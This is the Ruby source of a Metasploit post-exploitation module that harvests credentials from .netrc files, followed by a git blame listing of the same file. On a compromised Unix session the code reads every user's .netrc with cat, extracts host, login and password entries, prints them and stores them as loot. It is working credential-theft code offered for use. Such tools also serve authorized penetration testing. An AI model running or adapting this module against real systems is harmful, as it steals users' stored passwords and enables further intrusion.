metasploit-framework/modules/post/multi/gather/netrc_creds.rb

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
#   http://metasploit.com/
##

require 'msf/core'
require 'msf/core/post/common'
require 'msf/core/post/file'
require 'msf/core/post/unix'

class Metasploit3 < Msf::Post

	include Msf::Post::Common
	include Msf::Post::File
	include Msf::Post::Unix

	def initialize(info={})
		super( update_info( info,
				'Name'          => 'UNIX Gather .netrc Credentials',
				'Description'   => %q{
					Post Module to obtain credentials saved for FTP and other services in .netrc
				},
				'License'       => MSF_LICENSE,
				'Author'        => [ 'Jon Hart <jhart[at]spoofed.org>' ],
				'Platform'      => [ 'bsd', 'linux', 'osx', 'unix' ],
				'SessionTypes'  => [ 'shell' ]
			))
	end

	def run
		# A table to store the found credentials.
		cred_table = Rex::Ui::Text::Table.new(
		'Header'    => ".netrc credentials",
		'Indent'    => 1,
		'Columns'   =>
		[
			"Username",
			"Password",
			"Server",
		])

		# all of the credentials we've found from .netrc
		creds = []

		# walk through each user directory
		enum_user_directories.each do |user_dir|
			netrc_file = user_dir + "/.netrc"
			# the current credential from .netrc we are parsing
			cred = {}
			begin
				print_status("Reading: #{netrc_file}")
				# read their .netrc
				cmd_exec("test -r #{netrc_file} && cat #{netrc_file}").each_line do |netrc_line|
					# parse it
					netrc_line.strip!
					# get the machine name
					if (netrc_line =~ /machine (\S+)/)
						# if we've already found a machine, save this cred and start over
						if (cred[:host])
							creds << cred
							cred = {}
						end
						cred[:host] = $1
					end
					# get the user name
					if (netrc_line =~ /login (\S+)/)
						cred[:user] = $1
					end
					# get the password
					if (netrc_line =~ /password (\S+)/)
						cred[:pass] = $1
					end
				end

				# save whatever remains of this last cred if it is worth saving
				creds << cred if (cred[:host] and cred[:user] and cred[:pass])

			rescue ::Exception => e
				print_error("Couldn't read #{netrc_file}: #{e.to_s}")
			end
		end

		# print out everything we've found
		creds.each do |cred|
			cred_table << [ cred[:user], cred[:pass], cred[:host] ]
		end

		if cred_table.rows.empty?
			print_status("No creds collected")
		else
			print_line("\n" + cred_table.to_s)

			# store all found credentials
			p = store_loot(
				"netrc.creds",
				"text/csv",
				session,
				cred_table.to_csv,
				"netrc_credentials.txt",
				".netrc credentials")

			print_status("Credentials stored in: #{p.to_s}")
		end
	end

end
Add Metasploit license header (it's already MSF licensed) 2012-02-01 06:49:45 +00:00			`##`
			`# This file is part of the Metasploit Framework and may be subject to`
			`# redistribution and commercial restrictions. Please see the Metasploit`
Fix up the boilerplate comment to use a better url 2012-02-21 01:40:50 +00:00			`# web site for more information on licensing and terms of use.`
			`# http://metasploit.com/`
Add Metasploit license header (it's already MSF licensed) 2012-02-01 06:49:45 +00:00			`##`

Loot .netrc files, generic enum_user_directories 2012-01-29 22:03:57 +00:00			`require 'msf/core'`
			`require 'msf/core/post/common'`
			`require 'msf/core/post/file'`
Rename enum_user_dirs 2012-03-27 16:52:16 +00:00			`require 'msf/core/post/unix'`
Loot .netrc files, generic enum_user_directories 2012-01-29 22:03:57 +00:00
			`class Metasploit3 < Msf::Post`

			`include Msf::Post::Common`
			`include Msf::Post::File`
			`include Msf::Post::Unix`

			`def initialize(info={})`
			`super( update_info( info,`
Name caps and readability for new post modules 2012-02-14 22:21:51 +00:00			`'Name' => 'UNIX Gather .netrc Credentials',`
Change how creds are displayed and saved 2012-02-01 06:48:14 +00:00			`'Description' => %q{`
			`Post Module to obtain credentials saved for FTP and other services in .netrc`
			`},`
Loot .netrc files, generic enum_user_directories 2012-01-29 22:03:57 +00:00			`'License' => MSF_LICENSE,`
Update email address to use desired [at] format 2012-01-30 16:05:08 +00:00			`'Author' => [ 'Jon Hart <jhart[at]spoofed.org>' ],`
Loot .netrc files, generic enum_user_directories 2012-01-29 22:03:57 +00:00			`'Platform' => [ 'bsd', 'linux', 'osx', 'unix' ],`
			`'SessionTypes' => [ 'shell' ]`
			`))`
			`end`

			`def run`
Switch to store_loot, since report_auth_info only works with Host objects or IPs, currently (see https://dev.metasploit.com/redmine/issues/6313) 2012-01-31 07:08:02 +00:00			`# A table to store the found credentials.`
			`cred_table = Rex::Ui::Text::Table.new(`
			`'Header' => ".netrc credentials",`
			`'Indent' => 1,`
			`'Columns' =>`
			`[`
			`"Username",`
			`"Password",`
			`"Server",`
			`])`

			`# all of the credentials we've found from .netrc`
Loot .netrc files, generic enum_user_directories 2012-01-29 22:03:57 +00:00			`creds = []`
Switch to store_loot, since report_auth_info only works with Host objects or IPs, currently (see https://dev.metasploit.com/redmine/issues/6313) 2012-01-31 07:08:02 +00:00
Loot .netrc files, generic enum_user_directories 2012-01-29 22:03:57 +00:00			`# walk through each user directory`
			`enum_user_directories.each do \|user_dir\|`
			`netrc_file = user_dir + "/.netrc"`
Switch to store_loot, since report_auth_info only works with Host objects or IPs, currently (see https://dev.metasploit.com/redmine/issues/6313) 2012-01-31 07:08:02 +00:00			`# the current credential from .netrc we are parsing`
			`cred = {}`
			`begin`
Change how creds are displayed and saved 2012-02-01 06:48:14 +00:00			`print_status("Reading: #{netrc_file}")`
Switch to store_loot, since report_auth_info only works with Host objects or IPs, currently (see https://dev.metasploit.com/redmine/issues/6313) 2012-01-31 07:08:02 +00:00			`# read their .netrc`
			`cmd_exec("test -r #{netrc_file} && cat #{netrc_file}").each_line do \|netrc_line\|`
			`# parse it`
			`netrc_line.strip!`
			`# get the machine name`
			`if (netrc_line =~ /machine (\S+)/)`
			`# if we've already found a machine, save this cred and start over`
			`if (cred[:host])`
			`creds << cred`
			`cred = {}`
			`end`
			`cred[:host] = $1`
			`end`
			`# get the user name`
			`if (netrc_line =~ /login (\S+)/)`
			`cred[:user] = $1`
			`end`
			`# get the password`
			`if (netrc_line =~ /password (\S+)/)`
			`cred[:pass] = $1`
Loot .netrc files, generic enum_user_directories 2012-01-29 22:03:57 +00:00			`end`
			`end`
Change how creds are displayed and saved 2012-02-01 06:48:14 +00:00
			`# save whatever remains of this last cred if it is worth saving`
			`creds << cred if (cred[:host] and cred[:user] and cred[:pass])`

Switch to store_loot, since report_auth_info only works with Host objects or IPs, currently (see https://dev.metasploit.com/redmine/issues/6313) 2012-01-31 07:08:02 +00:00			`rescue ::Exception => e`
			`print_error("Couldn't read #{netrc_file}: #{e.to_s}")`
Loot .netrc files, generic enum_user_directories 2012-01-29 22:03:57 +00:00			`end`
			`end`

Switch to store_loot, since report_auth_info only works with Host objects or IPs, currently (see https://dev.metasploit.com/redmine/issues/6313) 2012-01-31 07:08:02 +00:00			`# print out everything we've found`
Loot .netrc files, generic enum_user_directories 2012-01-29 22:03:57 +00:00			`creds.each do \|cred\|`
Switch to store_loot, since report_auth_info only works with Host objects or IPs, currently (see https://dev.metasploit.com/redmine/issues/6313) 2012-01-31 07:08:02 +00:00			`cred_table << [ cred[:user], cred[:pass], cred[:host] ]`
Loot .netrc files, generic enum_user_directories 2012-01-29 22:03:57 +00:00			`end`

Change how creds are displayed and saved 2012-02-01 06:48:14 +00:00			`if cred_table.rows.empty?`
			`print_status("No creds collected")`
			`else`
			`print_line("\n" + cred_table.to_s)`

			`# store all found credentials`
			`p = store_loot(`
			`"netrc.creds",`
			`"text/csv",`
			`session,`
			`cred_table.to_csv,`
			`"netrc_credentials.txt",`
			`".netrc credentials")`

			`print_status("Credentials stored in: #{p.to_s}")`
			`end`
Loot .netrc files, generic enum_user_directories 2012-01-29 22:03:57 +00:00			`end`
Switch to store_loot, since report_auth_info only works with Host objects or IPs, currently (see https://dev.metasploit.com/redmine/issues/6313) 2012-01-31 07:08:02 +00:00
Loot .netrc files, generic enum_user_directories 2012-01-29 22:03:57 +00:00			`end`